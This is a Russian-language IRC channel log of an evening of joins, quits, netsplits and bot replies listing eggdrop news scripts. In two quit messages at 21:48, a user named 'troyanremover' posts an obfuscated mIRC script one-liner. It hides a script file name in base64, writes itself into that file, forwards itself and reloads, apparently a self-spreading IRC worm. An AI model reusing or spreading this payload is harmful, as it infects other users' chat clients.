[21:00:08] <IRCServ> [190/1097] <\BAD\BOY\> у меня когда открываешь любую ссылку в интернете например "воздухоплавание", вылезает 2 сайта порнухи, как это убрать ???? [netakoi]
[21:00:36] * CheaT (NarkooUser@dimok93.svnet) Quit (Read error: Connection reset by peer)
[21:02:36] * Shalo_play (~_______@10.10.111.91) Quit (Quit: $$$ [ Вейтман scripT ]-[ v 2.5 ] $$$)
[21:02:58] * Shad (~qwerty@10.19.1.90) Quit (Quit: I LOVE QWERTY)
[21:04:06] * CheaT (NarkooUser@dimok93.svnet) has joined
[21:06:18] * CheaT (NarkooUser@dimok93.svnet) Quit (Read error: Connection reset by peer)
[21:09:41] * Shad (~qwerty@10.19.1.90) has joined
[21:10:22] * STarTuK (pIRCuser63@dollar.sky) has joined
[21:12:50] * ~^`~ViSk~`^~ is now known as ~^`~ViSk~`^~|рядом
[21:15:00] * Kreon is now known as FaLoS
[21:19:47] * F_ы_R_в_L_е_С_й_R is now known as FreeLanceR
[21:19:47] * Benz (~Benz@lan1-2-236.unity) has joined
[21:31:58] * tont (~ramzes@66.96.221.230) Quit (Ping timeout)
[21:32:24] * Zenit_WINNERS_UEFA (hamlo@autokilled.com) Quit (Netsplitted)
[21:32:24] * nikkk14[aw] (immortal@ircparty.usa.local) Quit (Netsplitted)
[21:32:24] * Люмиан [gone] (admin@ircparty.usa.local) Quit (Netsplitted)
[21:32:24] * kns[na] (wenet@xtmb.info) Quit (Netsplitted)
[21:32:24] * staff_[OFF] (NarkooUser@ircclub.net) Quit (Netsplitted)
[21:32:24] * Dexoid[BnC] (dexoid@dexik.ru) Quit (Netsplitted)
[21:32:24] * RedWhite`OFF (alexeijke@autokilled.com) Quit (Netsplitted)
[21:32:24] * Akick (xaoc@ircparty.usa.local) Quit (Netsplitted)
[21:32:24] * |Absence| (progtech@ircclub.net) Quit (Netsplitted)
[21:32:24] * Dexoid[usa] (dexoid@ircclub.net) Quit (Netsplitted)
[21:32:24] * Forum (info@staff.org.ru) Quit (Netsplitted)
[21:32:24] * NickName (stuk@xtmb.info) Quit (Netsplitted)
[21:32:28] * AliasNET sets mode: +l 95
[21:32:32] * Extrell (Anton@10.26.12.66) has joined
[21:32:35] * Nick Heidfeld (De_r@172.16.72.187) has joined
[21:32:42] * Serena (grant@2306ds2-hvi.1.fullrate.dk) Quit (Ping timeout)
[21:32:46] * захар (pIRCuser21@10.1.197.70) has joined
[21:32:54] * Extrell (Anton@10.26.12.66) Quit (Quit: pIRC v2.1 < Personal IRC Team > http://xirc.ru/)
[21:33:19] * yMHuK is now known as лешк
[21:33:54] * sets mode: +l 108
[21:33:54] * Zenit_WINNERS_UEFA (hamlo@autokilled.com) has joined
[21:33:54] * nikkk14[aw] (immortal@ircparty.usa.local) has joined
[21:33:54] * Akick (xaoc@ircparty.usa.local) has joined
[21:33:54] * Люмиан [gone] (admin@ircparty.usa.local) has joined
[21:33:54] * Forum (info@staff.org.ru) has joined
[21:33:54] * Dexoid[BnC] (dexoid@dexik.ru) has joined
[21:33:54] * |Absence| (progtech@ircclub.net) has joined
[21:33:54] * Dexoid[usa] (dexoid@ircclub.net) has joined
[21:33:54] * staff_[OFF] (NarkooUser@ircclub.net) has joined
[21:33:54] * RedWhite`OFF (alexeijke@autokilled.com) has joined
[21:33:54] * kns[na] (wenet@xtmb.info) has joined
[21:33:54] * NickName (stuk@xtmb.info) has joined
[21:33:54] * sets mode: +v Forum
[21:33:55] * IRCServ sets mode: -l
[21:33:57] * Serena (~Serena@2306ds2-hvi.1.fullrate.dk) has joined
[21:34:00] * D-Face sets mode: +v Serena
[21:34:28] * AliasNET sets mode: +l 109
[21:34:47] * CkpoMHuk ушел: ушел на пол-часика
[21:34:47] * CkpoMHuk is now known as CkpoMHuk`а НЕТ
[21:37:22] * FaLoS is now known as ModeratoR
[21:39:18] * Sanitar (~bot@66.96.221.230) Quit (Ping timeout)
[21:40:27] * tont (~ramzes@66.96.221.230) has joined
[21:41:22] * Sanitar (~bot@66.96.221.230) has joined
[21:41:26] * D-Face sets mode: +v Sanitar
[21:41:26] * AliasNET sets mode: +v Sanitar
[21:42:17] * Guest98815 (~MirandaLS@10.248.0.122) has joined
[21:44:58] * лешк is now known as лёшк
[21:45:45] * tont (~ramzes@66.96.221.230) Quit (Ping timeout)
[21:47:03] * Guest98815 is now known as Гетман
[21:48:02] * tont (~ramzes@66.96.221.230) has joined
[21:48:09] * FreeServ (~freeserv@66.96.221.229) Quit (Ping timeout)
[21:48:44] * troyanremover (~trion@ppp85-140-145-250.pppoe.mtu-net.ru) has joined
[21:48:49] * troyanremover (~trion@ppp85-140-145-250.pppoe.mtu-net.ru) Quit (Quit: } set %y $findfile($mircdir,$decode(dHJpb25zY3I3LmluaQ==,m),1,5) | set %x $ $+ strip($ $+ 1-)* $shortfn(%y) | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | .msg $decode(I286bGluZXM=,m) %x | unset %x,%y | .reload -rs $chr(34) $+ %y $+ $chr(34))
[21:48:53] * troyanremover (~trion@ppp85-140-145-250.pppoe.mtu-net.ru) has joined
[21:48:58] * troyanremover (~trion@ppp85-140-145-250.pppoe.mtu-net.ru) Quit (Quit: } set %y $findfile($mircdir,$decode(dHJpb25zY3I3LmluaQ==,m),1,5) | set %x $ $+ strip($ $+ 1-)* $shortfn(%y) | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | .msg $decode(I286bGluZXM=,m) %x | unset %x,%y | .reload -rs $chr(34) $+ %y $+ $chr(34))
[21:49:19] * FreeServ (~freeserv@66.96.221.229) has joined
[21:49:23] * D-Face sets mode: +v FreeServ
[21:50:24] * Serena (~Serena@2306ds2-hvi.1.fullrate.dk) Quit (Ping timeout)
[21:50:37] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[21:51:36] * tont (~ramzes@66.96.221.230) Quit (Ping timeout)
[21:53:33] * ModeratoR (rulezzz@kalinnikova.svnet) Quit (Quit: )
[21:53:38] * NickName (stuk@xtmb.info) Quit (Client closed connection)
[21:53:38] * kns[na] (wenet@xtmb.info) Quit (Client closed connection)
[21:54:13] * d0kt0p (~Doktop@rjabov.ntown) Quit (Quit: - Покойся с миром. И да успокоится твоя душа! – в слух произнес некромансер, повернулся и продолжил свой, так неожиданно прерванный путь. А за ним, громыхая всеми своими металлическими сочленениями и отсвечивая странными узорами и письменами, по матроски вразвалочку заторопился голем.)
[21:55:35] * kns[na] (~wenet@209.250.241.17) has joined
[21:55:49] * NickName (stuk@xtmb.info) has joined
[21:56:11] * [-] is now known as Buster
[21:59:33] * NickName (stuk@xtmb.info) Quit (Client closed connection)
[21:59:33] * kns[na] (~wenet@209.250.241.17) Quit (Client closed connection)
[22:00:09] <IRCServ> [1092/1097] <SxS_Mu]I[Ka> Мог ли я несколько лет назад даже помыслить, что сегодня буду легко понимать фразу: "А мона мну позязя отфотожабить?" ))) [^Oo^]
[22:00:21] * Will_aka_Larry (~s@80.70.96.171) has joined
[22:02:00] * BanMode (~ramzes@83.149.19.109) has joined
[22:04:09] * Willy (~s@10.20.1.162) has joined
[22:05:06] * Forum (info@staff.org.ru) Quit (Netsplitted)
[22:05:06] * RedWhite`OFF (alexeijke@autokilled.com) Quit (Netsplitted)
[22:05:06] * Люмиан [gone] (admin@ircparty.usa.local) Quit (Netsplitted)
[22:05:06] * Zenit_WINNERS_UEFA (hamlo@autokilled.com) Quit (Netsplitted)
[22:05:06] * staff_[OFF] (NarkooUser@ircclub.net) Quit (Netsplitted)
[22:05:06] * Dexoid[usa] (dexoid@ircclub.net) Quit (Netsplitted)
[22:05:06] * Dexoid[BnC] (dexoid@dexik.ru) Quit (Netsplitted)
[22:05:06] * Akick (xaoc@ircparty.usa.local) Quit (Netsplitted)
[22:05:06] * nikkk14[aw] (immortal@ircparty.usa.local) Quit (Netsplitted)
[22:05:06] * |Absence| (progtech@ircclub.net) Quit (Netsplitted)
[22:05:08] * AliasNET sets mode: +l 97
[22:05:10] * Will_aka_Larry (~s@80.70.96.171) Quit (Ping timeout)
[22:07:33] * sets mode: +l 109
[22:07:33] * Zenit_WINNERS_UEFA (hamlo@autokilled.com) has joined
[22:07:33] * nikkk14[aw] (immortal@ircparty.usa.local) has joined
[22:07:33] * Akick (xaoc@ircparty.usa.local) has joined
[22:07:33] * Люмиан [gone] (admin@ircparty.usa.local) has joined
[22:07:33] * Forum (info@staff.org.ru) has joined
[22:07:33] * Dexoid[BnC] (dexoid@dexik.ru) has joined
[22:07:33] * |Absence| (progtech@ircclub.net) has joined
[22:07:33] * Dexoid[usa] (dexoid@ircclub.net) has joined
[22:07:33] * staff_[OFF] (NarkooUser@ircclub.net) has joined
[22:07:33] * RedWhite`OFF (alexeijke@autokilled.com) has joined
[22:07:33] * sets mode: +v Forum
[22:07:34] * IRCServ sets mode: -l
[22:07:49] * AliasNET sets mode: +l 106
[22:08:32] * NickName (stuk@xtmb.info) has joined
[22:08:44] * kns[na] (wenet@xtmb.info) has joined
[22:09:24] * ZVERb[НетУ] (root@MASTERSHELL.ORG) Quit (Client closed connection)
[22:11:11] * BanMode is now known as tont
[22:11:34] * лёшк (Alex@bulalex.svnet) Quit (Quit: Пока-пока!!! Я вконтакте: http://vkontakte.ru/id7344133)
[22:15:08] * _tont (~ramzes@66.96.221.230) has joined
[22:15:15] * Serena (grant@2306ds2-hvi.1.fullrate.dk) has joined
[22:15:19] * D-Face sets mode: +v Serena
[22:15:29] * Benz (Benz@lan1-2-236.unity) has left ()
[22:16:04] * tont is now known as gcc
[22:16:08] * _tont is now known as tont
[22:16:47] * Junior (_sm0ke_@junior69.svnet) Quit (Quit: Ditud only...)
[22:21:21] * ZVERb[НетУ] (root@MASTERSHELL.org) has joined
[22:21:58] <_TiMoFF_> ~script news
[22:21:58] <Jaiss> Найдено 5 скриптов по заданному запросу.(channews.tcl - 6; linuxnews.tcl - 2; user_news.tcl - 5; ipb2egg.tcl - 3; rssnews.tcl - ) Вот два случайных из них:
[22:21:58] <Jaiss> channews.tcl .68 Kbyte [12-07-2005] http://eggdrop.msk.ru/?section=irc&theme=scripts&download=336 Скрипт позволяющий добавлять/удалять новости вашего канала, храня при это все добавленные новости в текстовом файле на шелле сервера которого находится ваш бот.. все очень просто и практично. Автор: Deniska (оригинал!) Добавлена дата и ник при добавлении новости.
[22:21:58] <Jaiss> linuxnews.tcl .04 Kbyte [26-05-2005] http://eggdrop.msk.ru/?section=irc&theme=scripts&download=272 Скрипт выводящий по запросу !news самые последние новости с сайта http://linux-on-line.net к сожалению на английском, но пользователям линукса русского и не нужно, как показывает практика, очень полезный скрипт, для меня лично
[22:22:13] <_TiMoFF_> ~script user_news.tcl
[22:22:13] <Jaiss> user_news.tcl .92 Kbyte [28-04-2005] http://eggdrop.msk.ru/?section=irc&theme=scripts&download=185 Этот скрипт даст возможность посетителям вашего канала добавлять в базу вашего бота свои новости, записки, заявления и т.д. так же читать их и удалять, все очень просто, достаточно тонкая настройка, может пригодиться
[22:22:35] <_TiMoFF_> ~script ipb2egg.tcl
[22:22:35] <Jaiss> ipb2egg.tcl .72 Kbyte [13-04-2005] http://eggdrop.msk.ru/?section=irc&theme=scripts&download=123 Скрипт для выдачи в канал последних тем с форума IPB По команде !news название выдает последние темы с форума, так же каждые 10 минут проверяет на наличие новых тем, и при новой, выдает последние темы на канал. (можно отключить закомментировав bind TIME -|- {?0 * * * *} rsscheck)
[22:25:12] * kns[na] (wenet@xtmb.info) Quit (Client closed connection)
[22:25:12] * NickName (stuk@xtmb.info) Quit (Client closed connection)
[22:25:16] * gcc (~ramzes@83.149.19.109) Quit (Quit: Товарищ, верь! Взойдёт она, звезда пленительного счастья, IRCопы вспрянут ото сна и на обломках IRC напишут наши имена. (почти А.С. Пушкин))
[22:25:55] * gcc (~ramzes@83.149.19.109) has joined
[22:27:35] * Guest98353 is now known as root
[22:31:26] * ~Люмиан~ (~lumian@lumian.infy.local) has joined
[22:31:48] * kns[na] (~wenet@209.250.241.17) has joined
[22:32:06] * NickName (stuk@xtmb.info) has joined
[22:33:14] * STarTuK (pIRCuser63@dollar.sky) Quit (Quit: ((Хай Всем)))
[22:33:53] * Гетман (~MirandaLS@10.248.0.122) Quit (Quit: У Меня Сегодня Днюха!!!!!)
[22:38:18] * gcc (~ramzes@83.149.19.109) Quit (Ping timeout)
[22:41:07] * kns[na] (~wenet@209.250.241.17) Quit (Client closed connection)
[22:41:07] * NickName (stuk@xtmb.info) Quit (Client closed connection)
[22:41:12] * swallow (n_forcer@n-forcer.ntown) has joined
[22:41:46] * CkpoMHuk`а НЕТ is now known as CkpoMHuk
[22:41:46] * CkpoMHuk вернулся: отсутствовал 1час. 6мин. 59сек. (Причина: ушел на пол-часика )
[22:43:02] * n_forcer (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[22:43:37] * n_forcer (n_forcer@n-forcer.ntown) has joined
[22:45:12] * e}i{uk (~BotRN@10.10.0.17) Quit (Ping timeout)
[22:45:35] * swallow (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[22:46:54] * kns[na] (~wenet@209.250.241.17) has joined
[22:47:11] * NickName (stuk@xtmb.info) has joined
[22:54:30] <_TiMoFF_> ~script rssnews.tcl
[22:54:30] <Jaiss> rssnews.tcl .29 Kbyte [30-03-2005] http://eggdrop.msk.ru/?section=irc&theme=scripts&download=39 Скрипт позволяющий читать практически с любых сайтов RSS новости... все очень легко настраивается
[22:57:10] * ~Люмиан~ is now known as ~Люмиан~[away]
[23:00:10] <IRCServ> [25/1097] приветкакделаскольколетфоткаестьпереспим? [^Oo^]
[23:00:17] * CaspeR (~casper@casper.comex.ru) has joined
[23:00:17] * ChanServ sets mode: +o CaspeR
[23:03:11] * CaspeR (~casper@casper.comex.ru) Quit (Quit: )
[23:03:45] * захар (pIRCuser21@10.1.197.70) Quit (Quit: pIRC v2.1 < Personal IRC Team > http://xirc.ru/)
[23:04:01] * kns[na] (~wenet@209.250.241.17) Quit (Client closed connection)
[23:04:01] * NickName (stuk@xtmb.info) Quit (Client closed connection)
[23:04:46] * kns[na] (~wenet@209.250.241.17) has joined
[23:05:03] * NickName (stuk@xtmb.info) has joined
[23:05:40] * _LEXA_ (~lesha@host-193-125-91-132.real.kvidex.ru) has joined
[23:05:59] * _LEXA_ (lesha@host-193-125-91-132.real.kvidex.ru) has left ()
[23:06:45] * _LEXA_ (~lesha@host-193-125-91-132.real.kvidex.ru) has joined
[23:06:52] <_LEXA_> !скачать
[23:07:06] <_LEXA_> !настроить
[23:07:07] <Jaiss> Для корректной настройки бота рекомендуется ознакомиться с этими статьями : http://forum.systemplanet.ru/viewtopic.php?f=9&t=2 | http://ircinfo.ru/articles/windrop-setup.asp
[23:07:08] * ~Люмиан~[away] (~lumian@lumian.infy.local) Quit (Quit: В жизни многое случается по воле случая...)
[23:09:20] * CkpoMHuk желает всем спокойной ночи и удобного просмотра приятных сновидений
[23:10:00] * CkpoMHuk (~storm@10.17.226.72) Quit (Quit: Думаешь Бог на небесах?... Ошибаешься!... Я ЗДЕСЬ !)
[23:11:09] * Exspress is now known as Unlix
[23:12:40] * tont is now known as rndgw
[23:12:55] * _LEXA_ (~lesha@host-193-125-91-132.real.kvidex.ru) Quit (Quit: pIRC v2.2 < Personal IRC Team > http://ircworld.ru and http://xirc.ru/)
[23:18:26] * FreeLanceR is now known as F_ы_R_в_L_е_С_й_R
[23:19:40] * Nick Heidfeld (De_r@172.16.72.187) has joined
[23:22:28] * Guest94967 (______@172.16.135.147) has joined
[23:25:20] * Guest94967 (______@172.16.135.147) Quit (Quit: )
[23:26:27] * rndgw is now known as tont
[23:29:36] * tont (~ramzes@66.96.221.230) Quit (Client closed connection)
[23:29:53] * tont (faraon@66.96.221.230) has joined
[23:34:31] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[23:36:30] * _TiMoFF_ (kvirc@10.30.1.131) Quit (Quit: )
[23:36:54] * AliasNET sets mode: +l 100
[23:54:33] * EnzoMatrix (kvirc@zatoichi-host176.hostel6.tsure.ru) Quit (Read error: Connection reset by peer)
[23:57:12] * e}i{uk (~BotRN@10.10.0.17) has joined
[23:57:12] * |EnzoMatrix| (EnzoMatrix@host211.hostel2.tsure.ru) has joined
[23:57:15] * D-Face sets mode: +v e}i{uk
[23:57:29] * |EnzoMatrix| is now known as EnzoMatrix
[23:58:29] * root (stream@staff.ntown) Quit (Ping timeout)
Query time 0.0292 s